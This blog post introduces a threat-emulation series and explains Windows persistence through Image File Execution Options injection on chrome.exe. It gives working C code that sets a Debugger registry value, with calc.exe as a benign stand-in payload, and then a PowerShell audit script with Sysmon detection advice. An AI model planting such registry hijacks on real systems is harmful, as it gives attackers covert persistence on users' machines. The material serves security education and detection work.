Threat Emulation Series - Introduction - Event Triggered Execution
Description: This post introduces a series of blog posts in which I'll detail emulating threat actors and their associated TTPs with code.
In this particular blog post, we'll be diving into the topic of persistence, which can be accomplished by manipulating Windows registry key values! Specifically, we'll be examining the Event Triggered Execution technique, in which an attacker modifies system mechanisms to gain execution based upon specific events.
A great example of this is Image File Execution Options Injection, in which malicious content, such as malware, is executed when a specific event happens, such as an application opening, by modifying the Debugger value within the registry for that application.
So a general overview would be: we add a Debugger value for a specific application, such as a browser, and point it at our malware; each time a user launches the browser, our malware would execute instead.
Let's say we were targeting the Chrome application, whose Image File Execution Options key is located at HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe.
So we'd want to add a Debugger value under that key and set it to the full path of our executable (in this case, it's the classic calc.exe example).
We can do this via PowerShell:
Or we can do it via compiled C code using the Windows API (my personal favorite):
// Event Triggered Execution: Image File Execution Options Injection (T1546.012), Sub-Technique of Event Triggered Execution
#include <windows.h>
#include <stdio.h>

// Executable that IFEO will launch in place of the target (classic calc.exe example)
const char szEvilExecutable[] = "C:\\Windows\\System32\\calc.exe";
// Name of the registry value that the loader consults for a debugger
const char szValueName[] = "Debugger";
// IFEO key for the target application; RegOpenKeyEx requires it to already exist
const char szTargetKey[] = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\chrome.exe";

int main(void) {
    HKEY hKey = NULL;

    // Explicit ANSI variants so the char buffers above are correct regardless of UNICODE
    LSTATUS openResult = RegOpenKeyExA(HKEY_LOCAL_MACHINE, szTargetKey, 0, KEY_SET_VALUE, &hKey);
    if (openResult != ERROR_SUCCESS) {
        // Stop here rather than calling RegSetValueEx with an uninitialised handle
        printf("Error opening registry key (%ld)\n", (long)openResult);
        return 1;
    }
    printf("Opened registry key\n");

    // REG_SZ data must include the terminating NUL; sizeof() on the array covers it
    LSTATUS setResult = RegSetValueExA(hKey, szValueName, 0, REG_SZ,
                                       (const BYTE *)szEvilExecutable, (DWORD)sizeof(szEvilExecutable));
    if (setResult == ERROR_SUCCESS) {
        printf("Set the registry key value!\n");
    } else {
        printf("Error setting registry key value (%ld)\n", (long)setResult);
    }

    RegCloseKey(hKey);
    return 0;
}
And this is how it’d look running:
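For the blue-team side of this emulation, the artifact the technique leaves behind is a Debugger value under an Image File Execution Options subkey, so the natural check is to enumerate those subkeys and report every Debugger value found. The script below is an added example written for this post, not code from the original write-up; it assumes an elevated PowerShell session on the host being audited and uses only the built-in registry provider cmdlets. The function name Get-IfeoDebuggerEntries is my own.

```powershell
# Added example (not part of the original post): audit Image File Execution Options
# for Debugger values, the registry artifact left by the technique described above.

# Both the native and the WOW64 views of the IFEO key are checked.
$ifeoPaths = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
)

function Get-IfeoDebuggerEntries {
    param([string[]]$Paths = $ifeoPaths)

    foreach ($path in $Paths) {
        # Each subkey is named after the target executable (e.g. chrome.exe)
        Get-ChildItem -Path $path -ErrorAction SilentlyContinue | ForEach-Object {
            $props = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
            if ($null -ne $props -and $null -ne $props.PSObject.Properties['Debugger']) {
                [pscustomobject]@{
                    Target   = $_.PSChildName   # application whose launch is hijacked
                    Debugger = $props.Debugger  # executable that will actually run
                    Key      = $_.Name          # full key path for follow-up
                }
            }
        }
    }
}

# Print every Debugger entry; an empty result means no IFEO redirection is configured.
Get-IfeoDebuggerEntries | Format-Table -AutoSize
```

Any hit is a lead rather than a verdict, since legitimate debugging tools can register a Debugger value too, so the Debugger path should be checked against the software actually installed. Removing an unwanted entry is a matter of `Remove-ItemProperty -Path <Key> -Name Debugger`; for ongoing detection, Sysmon Event ID 13 (RegistryEvent, Value Set) with a TargetObject under the IFEO path captures the write the C program above performs.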